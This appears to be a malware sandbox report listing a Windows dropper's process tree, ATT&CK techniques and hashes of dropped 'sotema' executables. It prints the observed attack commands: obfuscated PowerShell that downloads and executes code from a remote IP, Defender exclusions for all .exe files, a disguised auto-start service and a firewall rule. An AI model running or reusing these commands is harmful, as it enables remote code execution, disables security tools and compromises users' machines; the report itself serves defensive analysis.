C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 432
7⤵
- Program crash
PID:5356

C:\Users\Admin\Documents\Tp7LtwUnnQy3yTqGPKzUbVGz.exe
"C:\Users\Admin\Documents\Tp7LtwUnnQy3yTqGPKzUbVGz.exe"
6⤵
PID:4568

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/Offer/Offer.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
PID:5252

C:\Users\Admin\Documents\1xr44gY0mRziBbhYtm5TyWrS.exe
"C:\Users\Admin\Documents\1xr44gY0mRziBbhYtm5TyWrS.exe"
6⤵
PID:4460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 440
7⤵
- Program crash
PID:6088

C:\Users\Admin\Documents\JZ_mPORREyeFDihf9Mrps7Su.exe
"C:\Users\Admin\Documents\JZ_mPORREyeFDihf9Mrps7Su.exe"
6⤵
PID:4392

C:\Users\Admin\Documents\tBA_bmtwopcqjcyDXB2QwZHW.exe
"C:\Users\Admin\Documents\tBA_bmtwopcqjcyDXB2QwZHW.exe"
6⤵
PID:4380

C:\Users\Admin\AppData\Local\Temp\b3869869-a1cf-4d82-a49a-1b562335fa34.exe
"C:\Users\Admin\AppData\Local\Temp\b3869869-a1cf-4d82-a49a-1b562335fa34.exe"
7⤵
PID:5400

C:\Users\Admin\Documents\S8PU_lYZMcWrKKVnADIqtoWD.exe
"C:\Users\Admin\Documents\S8PU_lYZMcWrKKVnADIqtoWD.exe"
6⤵
PID:4296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 924
7⤵
- Program crash
PID:6060

C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe
"C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe"
6⤵
PID:4236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe" -Force
7⤵
PID:5596

C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe
"C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe"
7⤵
PID:1960

C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe
"C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe"
7⤵
PID:2264

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension "exe" -Force
7⤵
PID:4220

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\d5IYhpSIRigYKfjh2cuXTxa8.exe" -Force
7⤵
PID:1392

C:\Users\Admin\Documents\UqBuCCe_FFnvvrbEOPvmZZnO.exe
"C:\Users\Admin\Documents\UqBuCCe_FFnvvrbEOPvmZZnO.exe"
6⤵
PID:4228

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\secqtukr\
7⤵
PID:6024

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create secqtukr binPath= "C:\Windows\SysWOW64\secqtukr\twmlegnq.exe /d\"C:\Users\Admin\Documents\UqBuCCe_FFnvvrbEOPvmZZnO.exe\"" type= own start= auto DisplayName= "wifi support"
7⤵
PID:2412

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description secqtukr "wifi internet conection"
7⤵
PID:6084

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start secqtukr
7⤵
PID:5116

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
7⤵
PID:5408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\twmlegnq.exe" C:\Windows\SysWOW64\secqtukr\
7⤵
PID:4260

C:\Users\Admin\kjdyymzg.exe
"C:\Users\Admin\kjdyymzg.exe" /d"C:\Users\Admin\Documents\UqBuCCe_FFnvvrbEOPvmZZnO.exe"
7⤵
PID:5808

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\lgvrlnlg.exe" C:\Windows\SysWOW64\secqtukr\
8⤵
PID:6080

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config secqtukr binPath= "C:\Windows\SysWOW64\secqtukr\lgvrlnlg.exe /d\"C:\Users\Admin\kjdyymzg.exe\""
8⤵
PID:4880

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start secqtukr
8⤵
PID:2500

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
8⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0350.bat" "
8⤵
PID:4996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 1276
8⤵
- Program crash
PID:4228

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4228 -s 592
7⤵
- Program crash
PID:4188

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:444

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_5.exe
sotema_5.exe
5⤵
- Executes dropped EXE
PID:632

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:748

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_4.exe
sotema_4.exe
5⤵
- Executes dropped EXE
PID:1516

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:2152

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
PID:4448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2468

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_3.exe
sotema_3.exe
5⤵
- Executes dropped EXE
PID:1752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1752 -s 1600
6⤵
- Program crash
PID:5816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_2.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4076

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_2.exe
sotema_2.exe
5⤵
- Executes dropped EXE
PID:3520

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sotema_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:4004

C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_1.exe
sotema_1.exe
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:2908

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
6⤵
PID:4132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
- Checks processor information in registry
- Enumerates system info in registry
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4244 -ip 4244
1⤵
PID:2212

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 4460 -ip 4460
1⤵
PID:1672

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
1⤵
PID:2376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/Fax.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4460 -s 432
1⤵
- Program crash
PID:2780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/RED.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4576 -ip 4576
1⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4596 -ip 4596
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4716 -ip 4716
1⤵
PID:5220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4716 -ip 4716
1⤵
PID:5508

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5140 -ip 5140
1⤵
PID:5340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1752 -ip 1752
1⤵
PID:5640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4716 -ip 4716
1⤵
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 4244 -ip 4244
1⤵
PID:5792

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4716 -ip 4716
1⤵
PID:6016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4460 -ip 4460
1⤵
PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 4596 -ip 4596
1⤵
PID:6060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4576 -ip 4576
1⤵
PID:1712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 6096 -ip 6096
1⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4296 -ip 4296
1⤵
PID:5796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4716 -ip 4716
1⤵
PID:4872

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4624 -ip 4624
1⤵
PID:4400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4228 -ip 4228
1⤵
PID:5844

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4716 -ip 4716
1⤵
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4716 -ip 4716
1⤵
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4716 -ip 4716
1⤵
PID:5824

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5808 -ip 5808
1⤵
PID:1752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4624 -ip 4624
1⤵
PID:3840

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sotema_7.exe.log
MD5
84cfdb4b995b1dbf543b26b86c863adc

SHA1
d2f47764908bf30036cf8248b9ff5541e2711fa2

SHA256
d8988d672d6915b46946b28c06ad8066c50041f6152a91d37ffa5cf129cc146b

SHA512
485f0ed45e13f00a93762cbf15b4b8f996553baa021152fae5aba051e3736bcd3ca8f4328f0e6d9e3e1f910c96c4a9ae055331123ee08e3c2ce3a99ac2e177ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurl.dll
MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurl.dll
MD5
d09be1f47fd6b827c81a4812b4f7296f

SHA1
028ae3596c0790e6d7f9f2f3c8e9591527d267f7

SHA256
0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

SHA512
857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurlpp.dll
MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libcurlpp.dll
MD5
e6e578373c2e416289a8da55f1dc5e8e

SHA1
b601a229b66ec3d19c2369b36216c6f6eb1c063e

SHA256
43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

SHA512
9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libgcc_s_dw2-1.dll
MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libgcc_s_dw2-1.dll
MD5
9aec524b616618b0d3d00b27b6f51da1

SHA1
64264300801a353db324d11738ffed876550e1d3

SHA256
59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

SHA512
0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libstdc++-6.dll
MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libstdc++-6.dll
MD5
5e279950775baae5fea04d2cc4526bcc

SHA1
8aef1e10031c3629512c43dd8b0b5d9060878453

SHA256
97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

SHA512
666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libwinpthread-1.dll
MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\libwinpthread-1.dll
MD5
1e0d62c34ff2e649ebc5c372065732ee

SHA1
fcfaa36ba456159b26140a43e80fbd7e9d9af2de

SHA256
509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

SHA512
3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\setup_install.exe
MD5
d474e5ce7c6fbe125adb6519ed02d191

SHA1
f826e0e60ea51283b2bdd1533d2accf912772c02

SHA256
b7de20b194e200ed1c2bc96ff1cb173d65e1a20f921fb35ed337aec886ceb0f6

SHA512
296ec316a766fb29fc2bb83e9b4375556a1e100cfaae34394f55946edb64d78a66e2ab6ea75f5022a808725625d18459238011e434b1a0530d917fafd524a51e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\setup_install.exe
MD5
d474e5ce7c6fbe125adb6519ed02d191

SHA1
f826e0e60ea51283b2bdd1533d2accf912772c02

SHA256
b7de20b194e200ed1c2bc96ff1cb173d65e1a20f921fb35ed337aec886ceb0f6

SHA512
296ec316a766fb29fc2bb83e9b4375556a1e100cfaae34394f55946edb64d78a66e2ab6ea75f5022a808725625d18459238011e434b1a0530d917fafd524a51e

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_1.exe
MD5
6e487aa1b2d2b9ef05073c11572925f2

SHA1
b2b58a554b75029cd8bdf5ffd012611b1bfe430b

SHA256
77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

SHA512
b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_1.txt
MD5
6e487aa1b2d2b9ef05073c11572925f2

SHA1
b2b58a554b75029cd8bdf5ffd012611b1bfe430b

SHA256
77eec57eba8ad26c2fd97cc4240a13732f301c775e751ee72079f656296d9597

SHA512
b7512fcf5dcfbe1c1807d85dfff39bd0cac57adf2696b7129a8c9d70ea7f8249c301a97ecba0f190eb622a216530215585ce6d8d8ce9b112e5728792ecace739

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_2.exe
MD5
2e42a8cbe1f718e4ea959b9db599d0d9

SHA1
9125fa3200087f2a2bb216347164e685a22d2f62

SHA256
ec994706caf7b63f40f1b8ab5deb73b3da530bf1e4ba9661bcadac8e95f072bb

SHA512
1ef6518d1712c52788e3cd6cca466ea9c5a32cd143c8bf894e2a0fceb3553f5e497c596e98095b7ed8eac7c5570fad30d9bd0df233c8f6789ca4070f9478a6bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_2.txt
MD5
2e42a8cbe1f718e4ea959b9db599d0d9

SHA1
9125fa3200087f2a2bb216347164e685a22d2f62

SHA256
ec994706caf7b63f40f1b8ab5deb73b3da530bf1e4ba9661bcadac8e95f072bb

SHA512
1ef6518d1712c52788e3cd6cca466ea9c5a32cd143c8bf894e2a0fceb3553f5e497c596e98095b7ed8eac7c5570fad30d9bd0df233c8f6789ca4070f9478a6bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_3.exe
MD5
7305fc535eed52eba4e4257820a95bce

SHA1
ee58cbe97168ae5c6b3380eef9a5042a6bf5dfaf

SHA256
d1dec77eb9e85b9556c5d67659515193cd4425ba3a5a69be7a2e9af9947b74e3

SHA512
4479284be8507bc8f476fc8d804e58cf910287310285ae5afe58ffee7913980145bbfff03f9801b6321d775d211af63f137bc613e0033d00528bf57d4f77f170

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_3.txt
MD5
7305fc535eed52eba4e4257820a95bce

SHA1
ee58cbe97168ae5c6b3380eef9a5042a6bf5dfaf

SHA256
d1dec77eb9e85b9556c5d67659515193cd4425ba3a5a69be7a2e9af9947b74e3

SHA512
4479284be8507bc8f476fc8d804e58cf910287310285ae5afe58ffee7913980145bbfff03f9801b6321d775d211af63f137bc613e0033d00528bf57d4f77f170

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_4.exe
MD5
5668cb771643274ba2c375ec6403c266

SHA1
dd78b03428b99368906fe62fc46aaaf1db07a8b9

SHA256
d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

SHA512
135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_4.txt
MD5
5668cb771643274ba2c375ec6403c266

SHA1
dd78b03428b99368906fe62fc46aaaf1db07a8b9

SHA256
d417bd4de6a5227f5ea5cff3567e74fe2b2a25c0a80123b7b37b27db89adc384

SHA512
135bd12414773cc84270af5225920a01487626528d7bbc2b703be71652265772c2e5488ee3f7e2c53b0b01c617b8c7920e0b457472b6724cfa9ec4c390b0a55a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_5.exe
MD5
306736b70ac8c75d53991f7295ca20ba

SHA1
23f4176b445311e50745e9ee72b124f32a9b3127

SHA256
c5dba34d07f5df1ab6579830d71bdfaf0c00139ea7d5e5378b88e26575d1b9c8

SHA512
459d968920ad4e9cca7827caf7186b3b12c62109c90d7296864007aa86504928f5758a9d62d1215ba30d3aa93238c10a4c684a2e19f872f628deb9d9af435b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_5.txt
MD5
306736b70ac8c75d53991f7295ca20ba

SHA1
23f4176b445311e50745e9ee72b124f32a9b3127

SHA256
c5dba34d07f5df1ab6579830d71bdfaf0c00139ea7d5e5378b88e26575d1b9c8

SHA512
459d968920ad4e9cca7827caf7186b3b12c62109c90d7296864007aa86504928f5758a9d62d1215ba30d3aa93238c10a4c684a2e19f872f628deb9d9af435b65

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_6.exe
MD5
987d0f92ed9871031e0061e16e7bbac4

SHA1
b69f3badc82b6da0ff311f9dc509bac244464332

SHA256
adb98685d3d6a8fa5e90b6fd9d458601d874718d5815f8aab66728ba9d067440

SHA512
f4ecf0bd996fd9aab99eba225bed9dbe2af3f8857a32bc9f0eda2c2fe8b468f5f853e68e96c029cf4cfd161409e072777db92a7502b58b541e0057b449f79770

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_6.txt
MD5
987d0f92ed9871031e0061e16e7bbac4

SHA1
b69f3badc82b6da0ff311f9dc509bac244464332

SHA256
adb98685d3d6a8fa5e90b6fd9d458601d874718d5815f8aab66728ba9d067440

SHA512
f4ecf0bd996fd9aab99eba225bed9dbe2af3f8857a32bc9f0eda2c2fe8b468f5f853e68e96c029cf4cfd161409e072777db92a7502b58b541e0057b449f79770

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_7.exe
MD5
f421a51b26c06de59948172ccfd1a2d6

SHA1
a851cb33400ae722ed6e942ae31c1554e1e297ff

SHA256
a44d8aa57db199503ee029bf73e922daabf707598b6d5cac1805d47bd956ad86

SHA512
f59cedea834d26d2db42ce0eafd1bbda27a0abebbe41ff4431104700005d20d320e2cdef6d6c4adf7f5e46793658efb5066b984a6fd0fdf04c9aab3a0220d670

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_7.exe
MD5
f421a51b26c06de59948172ccfd1a2d6

SHA1
a851cb33400ae722ed6e942ae31c1554e1e297ff

SHA256
a44d8aa57db199503ee029bf73e922daabf707598b6d5cac1805d47bd956ad86

SHA512
f59cedea834d26d2db42ce0eafd1bbda27a0abebbe41ff4431104700005d20d320e2cdef6d6c4adf7f5e46793658efb5066b984a6fd0fdf04c9aab3a0220d670

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_7.txt
MD5
f421a51b26c06de59948172ccfd1a2d6

SHA1
a851cb33400ae722ed6e942ae31c1554e1e297ff

SHA256
a44d8aa57db199503ee029bf73e922daabf707598b6d5cac1805d47bd956ad86

SHA512
f59cedea834d26d2db42ce0eafd1bbda27a0abebbe41ff4431104700005d20d320e2cdef6d6c4adf7f5e46793658efb5066b984a6fd0fdf04c9aab3a0220d670

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_8.exe
MD5
112f83f9d855241e275101bdfd4a7097

SHA1
7608f6721aeb2ec2a7deaefc66a7f1117fdd4a36

SHA256
d5e7a987dd3a93c9c435097fc95d76c07aadd16e08158fe9d42389c0793f2f7f

SHA512
b1401ef1e92edc9c9ee7229d09f1f8773ab665be9aada228bbb1244a970d904583f1c0458471e57f8e4bb5731d6c92e25e2e79fa78abae567c68e2edb8275959

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS0B2B8D0E\sotema_8.txt
MD5
112f83f9d855241e275101bdfd4a7097

SHA1
7608f6721aeb2ec2a7deaefc66a7f1117fdd4a36

SHA256
